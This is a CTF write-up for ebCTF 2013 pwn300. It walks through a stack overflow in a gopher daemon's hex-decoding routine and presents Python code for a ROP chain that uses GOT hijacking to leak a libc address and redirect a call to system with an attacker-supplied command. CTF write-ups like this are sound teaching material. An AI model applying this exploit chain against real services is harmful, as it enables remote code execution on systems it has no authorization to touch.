ebCTF 2013 pwn300 write-up

Sadly, I only found the time to do this write-up now, so the service is no longer online.

Basically, the service is a simple gopher daemon. When we first connected to the daemon with netcat, we did not get a reply. Looking at the code shows us why:

[Screenshot: Screen Shot 2013-08-11 at 21.00.17]

Note that we have already renamed the variables to match their semantics. The code first checks that the string is longer than one character. It then checks that buffer[length-2] == 0xd and buffer[length-1] == 0xa, which translates to a check for a trailing \r\n. If this is the case, it writes null bytes into these two positions and continues. Thus, let’s send just a \r\n. Doing this leads to a reply 🙂
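The check described above can be sketched in Python 3 as follows. This is only a model of the logic as read from the disassembly; the function name strip_crlf is made up for illustration and does not appear in the binary.

```python
def strip_crlf(buffer: bytes):
    """Return the request without its trailing CRLF, or None if the check fails."""
    length = len(buffer)
    # The daemon only proceeds for input longer than one byte ...
    if length <= 1:
        return None
    # ... that ends in 0x0d 0x0a, i.e. "\r\n".
    if buffer[length - 2] != 0x0D or buffer[length - 1] != 0x0A:
        return None
    # The binary overwrites both bytes with NULs; slicing has the same effect here.
    return buffer[:length - 2]

print(strip_crlf(b"\r\n"))   # b'' (check passes, request is empty)
print(strip_crlf(b"hello"))  # None (no CRLF, so no reply)
```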

The daemon welcomes us with some information on the CTF and afterwards a list with all available files. Alongside these is the entry

0FLAG	0f4d0db3668dd58cabb9eb409657eaa8	gopher.eindbazen.net	7070

Without looking at the binary any further, let’s send 0f4d0db3668dd58cabb9eb409657eaa8. Sadly (but of course), it returns ACCESS DENIED. Later analysis of the binary shows that upon loading all files, the content of FLAG is actually replaced with the aforementioned ACCESS DENIED. Thus, let’s continue. The first thought that comes to mind (especially since this is a pwn challenge) is a buffer overflow. So, we turn to the beginning of the function where data is read from the client.

[Screenshot: Screen Shot 2013-08-11 at 22.09.39]

Sadly, we note that the buffer used is 0x11F bytes away from EBP and we only read 0xff bytes 🙁 So, this obviously cannot be abused. However, at 0x08049593 we find a call to a function ascii_to_bin, which is given two parameters: references to the variables read_buffer and transformed_hash (both renamed for better readability). So, let’s look at what the code does…

[Screenshot: Screen Shot 2013-08-11 at 21.05.08]

In terms of abstraction, we note that the loop iterates from offset_in_string = 0 until offset_in_string = strlen(s), and the offset is incremented twice in the loop body. The function n_to_i transforms a hexlified input character into its numeric value; basically, the string “aa” is transformed into one byte, namely \xaa. This function apparently has no bounds checking. So, let’s abuse this! Looking back at the calling function, we see that the buffer this function writes to is located only 0x20 bytes away from EBP. Thus, in order to completely fill all 0x20 bytes up to EBP, we need 0x40 bytes of string data (remember, two hex characters are unhexlified into one byte). Next, we can overwrite the SFP and the return address. To jump to an address of our choice, we just need to write it in its hexlified form.
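To make the arithmetic concrete, here is a rough Python 3 model of the loop. It is a sketch under assumptions: the bodies of n_to_i and ascii_to_bin are reconstructed from the description, and the bytearray frame merely stands in for transformed_hash plus the saved EBP and the return address. The target address 0xdeadbeef is a dummy value.

```python
import binascii

def n_to_i(ch: str) -> int:
    """Value of one hex digit (assumed behaviour of the binary's n_to_i)."""
    return int(ch, 16)

def ascii_to_bin(s: str, out: bytearray) -> None:
    """Write one byte per two hex characters; only the input length limits the loop."""
    offset_in_string = 0
    while offset_in_string < len(s):
        hi = n_to_i(s[offset_in_string])
        lo = n_to_i(s[offset_in_string + 1])
        out[offset_in_string // 2] = (hi << 4) | lo
        offset_in_string += 2

HASH_SIZE = 0x20
frame = bytearray(HASH_SIZE + 8)   # transformed_hash, saved EBP, return address
filler = "41" * HASH_SIZE          # 0x40 hex characters fill the 0x20-byte buffer
sfp = "42424242"
ret = binascii.hexlify((0xDEADBEEF).to_bytes(4, "little")).decode()
ascii_to_bin(filler + sfp + ret, frame)

print(len(filler))                                           # 64
print(hex(int.from_bytes(frame[HASH_SIZE + 4:], "little")))  # 0xdeadbeef
```

In the real binary nothing stops the write at the end of the frame, which is exactly what makes the overflow possible.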

The first test in gdb worked fine in jumping somewhere. However, when we tried to actually exploit the vuln, we got a SIGSEGV. Tracing this back, we found that the call to ascii_to_bin was followed by a call to hashlist_find.

[Screenshot: Screen Shot 2013-08-11 at 21.00.25]

Quite apparent here is the parameter provided: arg_4. As arguments are located at ebp+8 upwards (arg_4 is then located at ebp+8+4 = ebp+0xC), we must be careful not to break things here. Thus, we ran the daemon on our own server, looked into it with GDB and figured out the proper address to put into our ROP chain.

Summarizing, our ROP payload needs to fulfill the following requirements:

  • It must fill up 0x20 bytes of buffer before we reach the SFP (located at the current EBP)
  • We are free to do what we want with EBP+4 (return EIP) and EBP+8 (first argument to the function)
  • We must make sure that EBP+0xC still points to a readable location

Since we must have the proper address at EBP+0xc, we must have some ROP gadget which “clears” this away. Looking at the binary with ROPgadget, we quickly find one at

0x0804a7dd: pop esi ; pop edi ; pop ebp ; ret

This removes the next three items from the stack into registers we do not really care about. Thus, we overwrite the saved return address (EIP) with said address, put some random stuff into EBP+0x8 and EBP+0x10 and put the proper address into EBP+0xC. This way, hashlist_find still works and we can nevertheless continue with our ROP chain.
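The resulting stack layout can be sketched like this (Python 3). The gadget address is the one from the ROPgadget output above; ARG_4_VALUE is a hypothetical placeholder for the pointer we found with GDB, and build_prefix is an illustrative helper, not part of the actual exploit library.

```python
import binascii
import struct

CLEAN_THREE = 0x0804A7DD   # pop esi ; pop edi ; pop ebp ; ret
ARG_4_VALUE = 0x0804C0A0   # HYPOTHETICAL: stands in for the pointer found with GDB
JUNK = 0x50415243          # "CRAP" read as a little-endian dword

def build_prefix(next_gadget: int) -> str:
    """Hexlified overflow data up to the point where the real ROP chain starts."""
    words = [
        JUNK,          # EBP      : saved frame pointer
        CLEAN_THREE,   # EBP+0x4  : return address
        JUNK,          # EBP+0x8  : arg_0, popped into esi
        ARG_4_VALUE,   # EBP+0xC  : arg_4, must stay valid for hashlist_find; popped into edi
        JUNK,          # EBP+0x10 : popped into ebp
        next_gadget,   # EBP+0x14 : where the gadget's ret continues
    ]
    raw = b"A" * 0x20 + b"".join(struct.pack("<I", w) for w in words)
    return binascii.hexlify(raw).decode()

payload = build_prefix(0x08048000)   # 0x08048000 is a dummy continuation address
print(payload[0x40 + 8:0x40 + 16])   # dda70408
```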

The goal for us was, although this might be overkill here, to utilize GOT hijacking to solve this challenge. In this case, the binary only forked. When forking, memory is shared copy-on-write, meaning that until memory is changed, the child and the parent share the same memory. Obviously, this could not work if the address space were re-randomized when forking. Thus, every child has the same memory layout and leaking a libc address once is sufficient. Nevertheless, I like the attack so I’m going to present it here.

Often within return-to-libc attacks, the binary does not use the function wanted by the attacker (such as system). However, knowing which libc is used, an attacker can still leverage the fact that the whole library is mapped into memory. We assume that we somehow know the address of the function write and also know which libc version is used. We can then analyze the library and determine the offsets of write and, for our attack, system. We now calculate the difference between these two offsets. Since we know where the function write is mapped in memory, we can easily deduce where system is. Thus, we can just call it directly.

As programs are supposed to work with multiple versions of libraries, the addresses cannot be hardcoded in the binary. Therefore, an ELF file has a so-called Global Offset Table. The GOT is basically a jump table for library calls and is filled at runtime upon first calling a library function. Subsequent calls to the same function can then be made directly without the need for resolving.
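The offset arithmetic for deducing system from a known address of write boils down to two lines. In this Python 3 sketch both offsets and the base address are invented for illustration; the real values have to be read from the libc that the target actually uses.

```python
# HYPOTHETICAL offsets; the real ones come from the target's libc symbol table.
WRITE_OFFSET = 0x000DB4B0
SYSTEM_OFFSET = 0x0003F430

def system_from_leak(leaked_write: int) -> int:
    """Derive the runtime address of system from the runtime address of write."""
    libc_base = leaked_write - WRITE_OFFSET
    return libc_base + SYSTEM_OFFSET

leaked = 0xB7E00000 + WRITE_OFFSET     # pretend libc is mapped at 0xb7e00000
print(hex(system_from_leak(leaked)))   # 0xb7e3f430
```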

The concept of GOT hijacking aims at just this fact. Firstly, the GOT offers us a nice way to retrieve the memory address of a libc function. If full RELRO is not active, the GOT is also writable. The basic idea behind GOT hijacking is to first read an address from the GOT and leak it to the attacker. The attacker may then calculate the address of the function he actually wants to call. The exploit code then waits for a new address to be sent back by the attacker. This address is then written to the same location we leaked the address from earlier. This effectively overwrites the pointer to the function (say write) with a pointer to system. All we need to do now is jump to the Procedure Linkage Table’s entry for write.
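As a toy model of the three steps (leak, compute, overwrite), consider the following Python 3 snippet. It does not touch real memory: the dictionaries only imitate a resolved GOT slot and the functions mapped from libc, and all addresses and offsets are made up.

```python
# address -> function, imitating libc mapped into the process (made-up addresses)
libc = {0xB7EDB4B0: "write", 0xB7E3F430: "system"}
# GOT slot of write after the dynamic linker has resolved it
got = {"write": 0xB7EDB4B0}

def call_via_plt(name: str) -> str:
    """A PLT stub jumps to whatever address its GOT slot currently holds."""
    return libc[got[name]]

leaked = got["write"]                 # step 1: leak the content of the slot
system = leaked - 0xDB4B0 + 0x3F430   # step 2: attacker computes system (made-up offsets)
got["write"] = system                 # step 3: write the result into the same slot

print(call_via_plt("write"))          # system
```

After the overwrite, every call that goes through the PLT entry for write ends up in system, with whatever arguments are on the stack.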

I wrote a Python library for this task and will only go into detail on the exploit generation here.

payload = []
FUNC_PLT, FUNC = self.findTarget(func_overwrite)
# this is most likely send
SEND_PLT, SEND = self.findTarget(func_send)
READ_PLT, READ = self.findTarget(func_read)
for i in range(buffersize):
  payload.append(struct.unpack("<I","{0}{0}{0}{0}".format(chr((i + 97) % 256)))[0])
# now, clean the stack just in case we need to access some args in the program itself
payload.append(clean_three)
payload.append(struct.unpack("<I", "CRAP")[0])
payload.append(struct.unpack("<I", "CRAP")[0])
payload.append(struct.unpack("<I", "CRAP")[0])
# now, retrieve the address to overwrite using the func_send function
payload.append(SEND)
payload.append(clean_three)
payload.append(fd_out)
payload.append(FUNC_PLT)
payload.append(4) # 32bit, thus 4 bytes to be sent
# now, on the client, we may receive the address and do stuff with it 🙂

payload.append(READ)
payload.append(clean_three)
payload.append(fd_in)
payload.append(FUNC_PLT)
payload.append(4) # 32bit, thus 4 bytes to be read

# now we need to store our command somewhere, either give a location or use the BSS

payload.append(READ)
payload.append(clean_three)
payload.append(fd_in)
payload.append(location) # this is for our command line buffer
payload.append(length_cmd)
# now our string for system is here

payload.append(FUNC)
payload.append(0x01020304)
payload.append(location)

for p in range(len(payload)):
  payload[p] = self.translater(payload[p])

return payload

To fully understand the code, let’s recap how library function calls work in assembly (at least on 32-bit x86). On 32-bit Linux, a libc function is called using the so-called cdecl calling convention. This means that parameters are pushed to the stack right to left. Since the stack grows downwards, this means that the first argument has the lowest address on the stack and the last one has the highest. Inside a function, local variables may be allocated. Both variables and parameters are usually referenced using the base pointer (EBP). When calling a function, the return address is also pushed to the stack, thus ending up below the first argument in memory. Thus, when entering the function, the stack looks something like this

0xFF arg3
0xFB arg2
0xF7 arg1
0xF3 ret

Thus, a function always assumes that it must skip some bytes to reach its parameters. With ROP, we don’t really do calls. This means that if we want to have a function with parameters called, we need to make sure the parameters are laid out in the form described above. This is illustrated in line 14 of the code listing. We put the address of our desired function SEND onto the stack. When this function returns, the RET will actually pop the next element on the stack into the EIP register. In lines 16 to 18 we pass our parameters to the function. Let’s assume for a minute that the instruction at the address we put onto the stack in line 15 was just a NOP followed by a RET. In the next step, the CPU would pop the next value into the EIP register. This obviously is not an address of an instruction we want to call but a parameter to SEND. Thus, here, we use a gadget which pops away the next three values. This means that the values put onto the stack in lines 16 to 18 can be used as parameters, but the program will not try to jump to them when going through the ROP chain.
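The pattern of function address, cleanup gadget, then arguments can be wrapped in a small helper. This Python 3 sketch is not taken from my library: rop_call is an illustrative name and all addresses except the gadget are hypothetical. It uses write and read as the three-argument functions so that the pop-pop-pop gadget removes exactly the arguments.

```python
import struct

def rop_call(func: int, cleanup: int, *args: int) -> list:
    """Stack words for one fake cdecl call: target, fake return address, arguments."""
    return [func, cleanup, *args]

CLEAN_THREE = 0x0804A7DD   # pop esi ; pop edi ; pop ebp ; ret
WRITE_PLT = 0x08048900     # HYPOTHETICAL addresses, for illustration only
READ_PLT = 0x08048800
FUNC_GOT = 0x0804C010      # HYPOTHETICAL GOT slot that is leaked and then overwritten
FD = 4                     # HYPOTHETICAL file descriptor of the client socket

chain = rop_call(WRITE_PLT, CLEAN_THREE, FD, FUNC_GOT, 4)   # leak 4 bytes
chain += rop_call(READ_PLT, CLEAN_THREE, FD, FUNC_GOT, 4)   # read 4 bytes back
raw = b"".join(struct.pack("<I", word) for word in chain)

print(len(chain), len(raw))   # 10 40
```

Because the cleanup gadget sits where a real call would have placed the return address, each function sees its arguments at the usual offsets and the chain continues behind them.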

The call in line 41 just encodes our payload in the way we want it; in this case we hexlify it. From here on, it’s simple. We have another script

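import struct
import telnetlib

t = telnetlib.Telnet(args.ip, args.port)
s = t.get_socket()
# send the hexlified ROP chain as a regular gopher request
s.send("%s\r\n" % payload)
# stage 1: the chain sends us the 4-byte GOT entry
leaked_got = struct.unpack("<I", s.recv(4))[0]
libc_base = leaked_got - g.findExport(func_overwrite)
system = libc_base + g.findExport("system")
# stage 2: the chain reads the address of system into the same GOT entry
s.send(struct.pack("<I", system))
# stage 3: the chain reads our command line into the buffer passed to system
s.send(cmd+"\n")
t.interact()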

This script now reads the leaked entry from the GOT, calculates the right address for system and sends it back. Afterwards, we send the command we want system to execute (lines 29 onward in the first code listing). Please note that the call to t.interact() does not work here, since STDOUT and STDIN are not redirected to our socket. Now, we just run our exploit and have it send us the flag via netcat 🙂

As mentioned earlier, we need knowledge of the used libc. Since we had already solved pwn200, we just used that library 🙂
